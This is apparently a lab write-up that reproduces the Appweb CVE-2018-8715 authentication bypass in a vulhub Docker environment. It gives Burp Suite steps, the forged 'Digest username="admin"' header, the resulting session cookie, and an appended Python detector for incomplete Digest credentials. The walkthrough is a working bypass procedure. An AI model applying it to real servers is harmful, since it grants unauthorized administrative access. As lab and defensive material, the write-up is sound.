Preparation:
Environment: vulhub lab, IP: 192.168.3.74
Tool: Burp Suite
Start the environment:
┌──(root㉿kali)-[~/Desktop/vulhub]
└─# cd appweb
┌──(root㉿kali)-[~/Desktop/vulhub/appweb]
└─# ls
CVE-2018-8715
┌──(root㉿kali)-[~/Desktop/vulhub/appweb]
└─# cd CVE-2018-8715
┌──(root㉿kali)-[~/Desktop/vulhub/appweb/CVE-2018-8715]
└─# docker-compose up -d
Creating network "cve-2018-8715_default" with the default driver
Pulling web (vulhub/appweb:7.0.1)...
7.0.1: Pulling from vulhub/appweb
419e7ae5bb1e: Pull complete
848839e0cd3b: Pull complete
de30e8b35015: Pull complete
2e66baab3c26: Pull complete
9a1adbcb76ed: Pull complete
Digest: sha256:f7dbbe93bb427774c89d55e9dca3343a15c906ef82386b693edaca7c0c922330
Status: Downloaded newer image for vulhub/appweb:7.0.1
Creating cve-2018-8715_web_1 ... done
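Reproduction steps
Visit http://your-ip:8080
Configure the proxy and open Burp Suite
Enter admin as the username, leave the password empty, log in directly, and capture the request
Send the captured request to the Request module
Change the value of the Authorization header to the following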
Authorization: Digest username="admin"
Then click Go to get the response
HTTP/1.1 200 OK
Set-Cookie: -http-session-=1::http.session::3cb69e5b65d0b8590d2888ad1dab945b; path=/; domain=192.168.3.74; httponly
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
X-Content-Type-Options: nosniff
Date: Wed, 20 Jul 2022 09:08:56 GMT
ETag: 1599442887
Cache-Control: no-cache="set-cookie"
Content-Length: 3322
X-XSS-Protection: 1; mode=block
Last-Modified: Mon, 10 Aug 2020 17:10:05 GMT
Connection: close
Accept-Ranges: bytes
Copy the Set-Cookie value to after the Authorization value and forward the request
Return to the browser and check: the authentication bypass succeeded
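
For defenders, the request in the steps above stands out because its Digest credentials carry only a username. The following check is an added example, not part of the original post: it flags Authorization headers whose Digest credentials lack the fields RFC 7616 requires. The function names and the sample requests are constructed for illustration.

```python
import re

# Fields RFC 7616 requires in every Digest Authorization request header.
REQUIRED = ("username", "realm", "nonce", "uri", "response")

# Matches key="quoted value" or key=token pairs inside the credentials.
PARAM_RE = re.compile(r'([A-Za-z][\w*-]*)\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^\s,"]+))')


def parse_digest(header_value):
    """Return the Digest parameters as a dict, or None for another scheme."""
    scheme, _, rest = header_value.strip().partition(" ")
    if scheme.lower() != "digest":
        return None
    params = {}
    for key, quoted, token in PARAM_RE.findall(rest):
        params[key.lower()] = quoted if quoted else token
    return params


def missing_digest_fields(header_value):
    """List required fields that are absent or empty; [] means well-formed."""
    params = parse_digest(header_value)
    if params is None:
        return []
    return [name for name in REQUIRED if not params.get(name)]


def flag_requests(requests):
    """Yield (source, path, missing) for requests with incomplete Digest credentials."""
    for source, path, auth in requests:
        missing = missing_digest_fields(auth)
        if missing:
            yield source, path, missing


# Constructed sample data: (client address, path, Authorization header value).
SAMPLE = [
    ("192.0.2.10", "/", 'Digest username="admin"'),
    ("192.0.2.11", "/", 'Digest username="admin", realm="example.com", '
     'nonce="bm9uY2U=", uri="/", response="6629fae49393a05397450978507c4ef1", qop=auth'),
    ("192.0.2.12", "/", "Basic YWRtaW46"),
]

if __name__ == "__main__":
    for source, path, missing in flag_requests(SAMPLE):
        print(f"{source} {path}: Digest credentials missing {', '.join(missing)}")
```

The same field check can run in a reverse proxy or over captured request logs; a hit on a 200 response that also sets a session cookie, as in the response shown above, deserves the closest look.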